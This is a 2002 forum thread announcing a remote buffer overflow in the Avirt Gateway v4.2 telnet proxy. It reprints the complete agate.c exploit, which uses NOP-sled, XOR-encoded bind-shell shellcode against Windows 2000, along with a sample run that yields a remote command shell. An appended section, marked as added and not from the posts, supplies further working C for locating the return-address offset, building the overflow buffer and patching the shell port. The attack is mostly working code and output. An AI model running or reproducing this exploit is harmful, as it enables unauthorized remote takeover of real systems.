February 14th, 2002, 10:48 PM
#1
Avirt Gateway v4.2-proof of concept
The telnet proxy of the Avirt Gateway v4.2 is vulnerable to a remotely exploitable buffer overflow which allows execution of arbitrary code. Entering a string of about 510 bytes at the "Ready>" prompt will overwrite EIP.
The exploit will bind a shell to a specified port on the attacked host.
Read the proof of concept at www.xatrix.org
-
February 15th, 2002, 06:09 AM
#2
And for those who couldn't be bothered to click the link...
Avirt Gateway 4.2 remote buffer overflow: proof of concept
The telnet proxy of the Avirt Gateway v4.2 is vulnerable to a remotely exploitable buffer overflow which allows execution of arbitrary code. Entering a string of about 510 bytes at the "Ready>" prompt will overwrite EIP.
The exploit will bind a shell to a specified port on the attacked host.
Example:
bash-2.05$ agate 10.0.0.1 7007
Avirt Gateway 4.2 remote exploit by uid0x00 (uid0x00@haked.com)
initialising socket
...initialized
trying to connect
...connected
(waiting)
sending exploit
...sent
(waiting)
...closed
shell bound to port 7007
bash-2.05$ nc -v target 7007
target [10.0.0.1] 7007 (?) open
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:\>
Exploit:
----------------------------------------------------------------------------cut----------------------------------------------------------------------------
/* agate.c by uid0x00
 * Avirt Gateway 4.2 remote exploit
 * compile with gcc agate.c -o agate
 *
 * tested with win2k, sp2
 *
 * thx to ByteRage, exploit is based on his shellcode
 */

/* Set the following three defines according to the DLL we use */
// MSVCRT.DLL version 6.10.8924.0 (win2K)
#define LoadLibraryRefNEG "\x30\xCF\xFC\x87"
#define GetProcAddressRefADD "\xFC"
#define newEIP "\x60\x32\xFA\x74" // Should JMP/CALL EBX

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

int main(int argc, char *argv[]) {
    int s;
    struct sockaddr_in SockAdr;
    char exploit[1024];
    unsigned short int a_port;
    char shellcode[] =
    /* ==== SHELLC0DE START ==== */
    /* shellcode based on ByteRage's 450byte code (thx for your help man!) */
    /* bytes 0..511 are the NOP sled that lands in the proxy's stack buffer;
       the EB 06 at offset 508 is a short jump over the four newEIP bytes at
       512..515 (the saved return address), so execution resumes at 516 */
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xEB\x06\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\xEB\x06\x90\x90" newEIP "\x90\x90\x90\x90\x90\x90\x90\x90\x90\xE8\xFF\xFF\xFF\xFF"
    /* from here on ByteRage's code: get EIP via CALL -1, then the XOR 0x99
       decoder loop (80 36 99 / E2 FA), so everything after it is stored
       pre-encoded, including the sockaddr_in that holds the listen port */
    "\xC0\x5E\xAC\x84\xC0\x75\xFB\x8B\xFE\x33\xC9\xB1\xC1\x4E\x80\x36\x99\xE2\xFA\xBB" LoadLibraryRefNEG
    "\xF7\xDB\x56\xFF\x13\x95\xAC\x84\xC0\x75\xFB\x56\x55\xFF\x53" GetProcAddressRefADD "\xAB\xAC"
    "\x84\xC0\x75\xFB\xAC\x3C\x21\x74\xE7\x72\x03\x4E\xEB\xEB\x33\xED\x55\x6A\x01\x6A\x02\xFF"
    "\x57\xE8\x93\x6A\x10\x56\x53\xFF\x57\xEC\x6A\x02\x53\xFF\x57\xF0\x33\xC0\x57\x50\xB0\x0C"
    "\xAB\x58\xAB\x40\xAB\x5F\x55\x57\x56\xAD\x56\xFF\x57\xC0\x55\x57\xAD\x56\xAD\x56\xFF\x57"
    "\xC0\xB0\x44\x89\x07\x57\xFF\x57\xC4\x8B\x46\xF4\x89\x47\x3C\x89\x47\x40\xAD\x89\x47\x38"
    "\x33\xC0\x89\x47\x30\x66\xB8\x01\x01\x89\x47\x2C\x57\x57\x55\x55\x55\x6A\x01\x55\x55\x56"
    "\x55\xFF\x57\xC8\xFF\x76\xF0\xFF\x57\xCC\xFF\x76\xFC\xFF\x57\xCC\x55\x55\x53\xFF\x57\xF4"
    "\x93\x33\xC0\xB4\x04\x50\x6A\x40\xFF\x57\xD4\x96\x6A\x50\xFF\x57\xE0\x8B\xCD\xB5\x04\x55"
    "\x55\x57\x51\x56\xFF\x77\xAF\xFF\x57\xD0\x8B\x0F\xE3\x18\x55\x57\x51\x56\xFF\x77\xAF\xFF"
    "\x57\xDC\x0B\xC0\x74\x21\x55\xFF\x37\x56\x53\xFF\x57\xF8\xEB\xD0\x33\xC0\x50\xB4\x04\x50"
    "\x56\x53\xFF\x57\xFC\x55\x57\x50\x56\xFF\x77\xB3\xFF\x57\xD8\xEB\xB9\xFF\x57\xE4\xD2\xDC"
    "\xCB\xD7\xDC\xD5\xAA\xAB\x99\xDA\xEB\xFC\xF8\xED\xFC\xC9\xF0\xE9\xFC\x99\xDE\xFC\xED\xCA"
    "\xED\xF8\xEB\xED\xEC\xE9\xD0\xF7\xFF\xF6\xD8\x99\xDA\xEB\xFC\xF8\xED\xFC\xC9\xEB\xF6\xFA"
    "\xFC\xEA\xEA\xD8\x99\xDA\xF5\xF6\xEA\xFC\xD1\xF8\xF7\xFD\xF5\xFC\x99\xC9\xFC\xFC\xF2\xD7"
    "\xF8\xF4\xFC\xFD\xC9\xF0\xE9\xFC\x99\xDE\xF5\xF6\xFB\xF8\xF5\xD8\xF5\xF5\xF6\xFA\x99\xCE"
    "\xEB\xF0\xED\xFC\xDF\xF0\xF5\xFC\x99\xCB\xFC\xF8\xFD\xDF\xF0\xF5\xFC\x99\xCA\xF5\xFC\xFC"
    "\xE9\x99\xDC\xE1\xF0\xED\xC9\xEB\xF6\xFA\xFC\xEA\xEA\x99\xB8\xCE\xCA\xD6\xDA\xD2\xAA\xAB"
    "\x99\xEA\xF6\xFA\xF2\xFC\xED\x99\xFB\xF0\xF7\xFD\x99\xF5\xF0\xEA\xED\xFC\xF7\x99\xF8\xFA"
    /* "\x9B\x99\x82\xA1\x99..." at offset 962 is the encoded sockaddr_in:
       family 2, port (patched below at 964..965), INADDR_ANY */
    "\xFA\xFC\xE9\xED\x99\xEA\xFC\xF7\xFD\x99\xEB\xFC\xFA\xEF\x99\x99\x9B\x99\x82\xA1\x99\x99"
    "\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\xFA\xF4\xFD\x99\x0D\x0A";
    /* ==== SHELLC0DE ENDS ==== */

    printf("\nAvirt Gateway 4.2 remote exploit by uid0x00 (uid0x00@haked.com)\n\n");
    if (argc < 3) {
        printf("usage: %s <target> <shell port>\n", argv[0]);
        return 0;
    }

    // insert shell port: network byte order, XORed with 0x99 per byte like the
    // rest of the encoded payload (hence 0x9999); the decoder stub undoes it
    a_port = htons(atoi(argv[2]));
    a_port ^= 0x9999;
    shellcode[964] = (a_port) & 0xff;
    shellcode[965] = (a_port >> 8) & 0xff;

    // init the exploit buffer; fill all of it so no uninitialised bytes go out
    memset(exploit, '\xCC', sizeof(exploit));
    memcpy(exploit, shellcode, sizeof(shellcode) - 1);

    printf("initialising socket\n");
    s = socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
    if (s < 0) {                            // socket() returns -1 on failure
        printf("... failed errno = %i\n", errno);
        return 0;
    }
    printf("...initialized\n");
    memset(&SockAdr, 0, sizeof(SockAdr));
    SockAdr.sin_addr.s_addr = inet_addr(argv[1]);
    SockAdr.sin_family = AF_INET;
    SockAdr.sin_port = htons(23);           // the telnet proxy
    printf("trying to connect\n");
    if (!connect(s, (struct sockaddr *)&SockAdr, sizeof(SockAdr))) {
        printf("...connected\n");
        printf("(waiting)\n");
        sleep(3);                           // give the "Ready>" prompt time to arrive
        printf("sending exploit\n");
        send(s, exploit, sizeof(exploit), 0);
        printf("...sent\n");
        printf("(waiting)\n");
        sleep(3);
        printf("...closed\nshell bound to port %s\n", argv[2]);
        close(s);
    }
    else {
        printf("... failed errno = %i\n", errno);
        close(s);
        return 0;
    }
    return 0;
}
----------------------------------------------------------------------------cut----------------------------------------------------------------------------
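Added example, not from either post and not part of agate.c: the layout arithmetic behind "a string of about 510 bytes overwrites EIP", in working C. A cyclic pattern plus lookup turns the EIP value seen at the crash into the exact offset of the saved return address, build_overflow() lays the string out the way agate.c does (NOP sled, EB 06 short jump just before the saved return address, the address little-endian, payload right after it), and patch_port()/decoded_port() show why the port is XORed with 0x99 before it is written into ByteRage's self-decoding shellcode. The 512 offset and the 0x99 key are read off the posted exploit; the return address 0x74FA3260 is the post's newEIP and is used here only as a sample value, as is the 1024-byte probe size.

```c
/* Added example (not from the post or from agate.c). EIP_OFFSET and XOR_KEY
 * are read off the posted exploit: newEIP sits at shellcode[512..515] and the
 * port is XORed with 0x9999 before patching. 0x74FA3260 is a sample value. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define EIP_OFFSET 512
#define XOR_KEY    0x99

/* Cyclic pattern "Aa0Aa1...Aa9Ab0...": every 4-byte window is unique in the
   first 20280 bytes, so a value read out of EIP at the crash locates itself. */
size_t fill_pattern(unsigned char *buf, size_t len)
{
    size_t n = 0;
    for (char a = 'A'; a <= 'Z' && n < len; a++)
        for (char b = 'a'; b <= 'z' && n < len; b++)
            for (char c = '0'; c <= '9' && n < len; c++) {
                const char trip[3] = { a, b, c };
                for (int i = 0; i < 3 && n < len; i++)
                    buf[n++] = (unsigned char)trip[i];
            }
    return n;
}

/* Offset of the 4 bytes that became EIP (x86 pops the return address
   little-endian), or -1 if the value did not come from the pattern. */
long pattern_offset(const unsigned char *buf, size_t len, uint32_t eip)
{
    const unsigned char want[4] = { (unsigned char)eip, (unsigned char)(eip >> 8),
                                    (unsigned char)(eip >> 16), (unsigned char)(eip >> 24) };
    for (size_t i = 0; i + 4 <= len; i++)
        if (memcmp(buf + i, want, 4) == 0)
            return (long)i;
    return -1;
}

/* Simulated crash: the proxy copies the whole 1024-byte pattern over its
   frame and the saved return address is whatever sat at offset 512 of it. */
long demo_eip_offset(void)
{
    unsigned char pat[1024];
    size_t n = fill_pattern(pat, sizeof pat);
    uint32_t eip = (uint32_t)pat[512] | (uint32_t)pat[513] << 8
                 | (uint32_t)pat[514] << 16 | (uint32_t)pat[515] << 24;
    return pattern_offset(pat, n, eip);
}

/* agate.c's shape: NOP sled up to the saved return address, EB 06 ("JMP SHORT
   +6") right before it so a landing anywhere in the sled skips the 2 NOPs and
   the 4 address bytes and resumes at EIP_OFFSET+4, where the payload starts.
   Returns the total length, 0 if it does not fit in cap. */
size_t build_overflow(unsigned char *out, size_t cap, uint32_t ret_addr,
                      const unsigned char *payload, size_t payload_len)
{
    size_t need = EIP_OFFSET + 4 + payload_len;
    if (cap < need)
        return 0;
    memset(out, 0x90, EIP_OFFSET);
    out[EIP_OFFSET - 4] = 0xEB;
    out[EIP_OFFSET - 3] = 0x06;
    for (int i = 0; i < 4; i++)                       /* little-endian address */
        out[EIP_OFFSET + i] = (unsigned char)(ret_addr >> (8 * i));
    memcpy(out + EIP_OFFSET + 4, payload, payload_len);
    return need;
}

/* One byte of the layout built for ret_addr with a 2-byte int3 stand-in
   payload, or -1 past the end. */
int layout_byte(uint32_t ret_addr, size_t off)
{
    unsigned char buf[EIP_OFFSET + 4 + 2];
    const unsigned char payload[2] = { 0xCC, 0xCC };
    size_t n = build_overflow(buf, sizeof buf, ret_addr, payload, sizeof payload);
    return off < n ? buf[off] : -1;
}

/* The posted shellcode is XOR-0x99 encoded and decodes itself at run time, so
   a port patched into it is stored pre-encoded, high byte first (network
   order), as the sin_port field of the sockaddr_in the decoder reveals. */
void patch_port(unsigned char *enc, size_t off, uint16_t port)
{
    enc[off]     = (unsigned char)((port >> 8) ^ XOR_KEY);
    enc[off + 1] = (unsigned char)((port & 0xff) ^ XOR_KEY);
}

uint16_t decoded_port(const unsigned char *enc, size_t off)
{
    return (uint16_t)(((enc[off] ^ XOR_KEY) << 8) | (enc[off + 1] ^ XOR_KEY));
}

uint16_t demo_port_roundtrip(uint16_t port)
{
    unsigned char slot[2];
    patch_port(slot, 0, port);
    return decoded_port(slot, 0);
}

/* shellcode[964..965] as posted (82 A1): the port agate.c binds if unpatched. */
uint16_t posted_default_port(void)
{
    const unsigned char posted[2] = { 0x82, 0xA1 };
    return decoded_port(posted, 0);
}

int main(void)
{
    printf("return address offset from the pattern: %ld\n", demo_eip_offset());
    printf("layout: [508]=%02X [509]=%02X ret=%02X %02X %02X %02X payload[0]=%02X\n",
           layout_byte(0x74FA3260u, 508), layout_byte(0x74FA3260u, 509),
           layout_byte(0x74FA3260u, 512), layout_byte(0x74FA3260u, 513),
           layout_byte(0x74FA3260u, 514), layout_byte(0x74FA3260u, 515),
           layout_byte(0x74FA3260u, 516));
    printf("port 7007 after encode/decode: %u, posted default: %u\n",
           demo_port_roundtrip(7007), posted_default_port());
    return 0;
}
```

Compile with gcc and run. The point worth checking by hand is that pattern_offset() answers 512 for the word read at offset 512, which is how the advisory's "about 510 bytes" becomes exactly 512 in agate.c, and that the two bytes 82 A1 in the posted shellcode are just 0x1B38 (port 6968) in network order XOR 0x99, so patching a new port means writing htons(port) ^ 0x9999 and nothing else.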